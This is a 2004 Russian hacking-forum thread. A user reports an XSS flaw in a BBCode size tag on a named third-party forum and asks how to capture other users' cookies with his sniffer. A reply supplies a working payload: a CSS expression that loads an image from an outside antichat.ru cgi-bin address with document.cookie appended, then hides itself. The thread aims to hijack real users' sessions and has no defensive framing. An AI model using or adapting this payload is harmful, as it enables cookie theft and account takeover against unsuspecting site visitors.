Форум АНТИЧАТ - Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров? (https://forum.antichat.xyz/showthread.php?t=3138)

Sky	02.11.2004 23:44

Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров?

В одном форуме есть XSS в теге size рабочий пример:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(alert(document.cookie)) ]lol[/size][/QUOTE]<span id='postcolor'> подскажите пожалуйста какой запрос надо вставить что бы получить куки юзеров к вам на снифер.

Algol

03.11.2004 22:14

Адрес приведи...
Или мы гадать должны какие там фильтры стоят ?

Sky	04.11.2004 00:06

Извини вот адрес:
http://www.lewismedia.com/forums/index.php
P.S Если не лень подскажи где можно почитать про XSS очень интересная тема спасибо.

Algol

04.11.2004 15:02

Вот такое работает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=expression(eval(this.innerText))]if(this.sss ==null){i=new Image();i.src="http:/"+"/antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=11;this.style.dis play="none"}[/size]
[/QUOTE]<span id='postcolor'>

Время: 21:17